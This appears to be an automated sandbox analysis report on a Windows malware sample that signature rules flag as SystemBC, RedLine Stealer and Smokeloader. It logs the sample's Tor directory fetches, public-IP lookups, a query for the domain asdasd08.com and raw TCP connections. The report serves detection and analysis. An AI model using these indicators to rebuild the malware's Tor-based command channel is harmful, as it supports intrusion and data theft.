            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficTCP traffic: 192.168.2.3:49689 -> 34.171.171.32:4039
            Source: global trafficTCP traffic: 192.168.2.3:49700 -> 144.217.95.12:9001
            Source: global trafficTCP traffic: 192.168.2.3:49702 -> 151.20.208.221:9030
            Source: global trafficTCP traffic: 192.168.2.3:49720 -> 84.155.152.82:14074
            Source: global trafficTCP traffic: 192.168.2.3:49721 -> 77.7.81.140:9030
            Source: global trafficTCP traffic: 192.168.2.3:49739 -> 84.62.245.6:9001
            Source: global trafficTCP traffic: 192.168.2.3:49740 -> 84.144.111.46:9031
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
            Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: unknownTCP traffic detected without corresponding DNS query: 131.188.40.189
            Source: orvsmwx.exe, 00000001.00000003.266947367.0000000001CF0000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.364709435.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.264170871.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.256502569.0000000001970000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.270852014.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.458304685.0000000000D10000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.257004533.00000000019B0000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.369687710.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.357230829.0000000001980000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.357387552.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.356893099.0000000001930000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.370114126.0000000001B60000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.365870747.0000000001C90000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.457651138.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.260754380.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.356920594.0000000001930000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.457509207.0000000000500000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.257457810.0000000001920000.00000004.00001000.00020000.00000000.sdmp, orvsmwx.exe, 00000001.00000003.259547423.0000000001A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://386bsd.net
            Source: p9CvI6kq7d.exe, p9CvI6kq7d.exe, 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, p9CvI6kq7d.exe, 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: p9CvI6kq7d.exe, 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, p9CvI6kq7d.exe, 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/https://ip4.seeip.org/Microsoft
            Source: p9CvI6kq7d.exe, p9CvI6kq7d.exe, 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, p9CvI6kq7d.exe, 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ip4.seeip.org/
            Source: unknownDNS traffic detected: queries for: asdasd08.com
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00404A1A ioctlsocket,connect,connect,select,ioctlsocket,WSAIoctl,select,recv,0_2_00404A1A
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.0Host: ip4.seeip.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 131.188.40.189User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/aacd4e09e65ba18caf35fbc855ef659505b36e9e HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0Host: 151.20.208.221User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 131.188.40.189User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/5d5ddff29b96cc566aa746636868eb07f97de60c HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0Host: 77.7.81.140User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 193.23.244.244User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/742091486d04734c57d97bcefb53d22ed0b77881 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0Host: 84.144.111.46User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: global trafficHTTP traffic detected: GET /tor/status-vote/current/consensus HTTP/1.0Host: 86.59.21.38User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49691 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.3:49756 version: TLS 1.2
            Source: C:\Users\user\Desktop\p9CvI6kq7d.exeCode function: 0_2_00403E30 CryptImportKey,CryptExportKey,CryptDestroyKey,0_2_00403E30

            System Summary

            barindex
            Source: 0.3.p9CvI6kq7d.exe.680000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.p9CvI6kq7d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.p9CvI6kq7d.exe.670e50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 1.3.orvsmwx.exe.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.p9CvI6kq7d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 00000001.00000003.249872863.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects SystemBC Author: ditekSHen
            Source: 00000000.00000002.245017062.0000000000546000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects SystemBC Author: ditekSHen
            Source: 00000000.00000003.243252141.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects SystemBC Author: ditekSHen
            Source: p9CvI6kq7d.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.p9CvI6kq7d.exe.680000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.p9CvI6kq7d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.p9CvI6kq7d.exe.670e50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
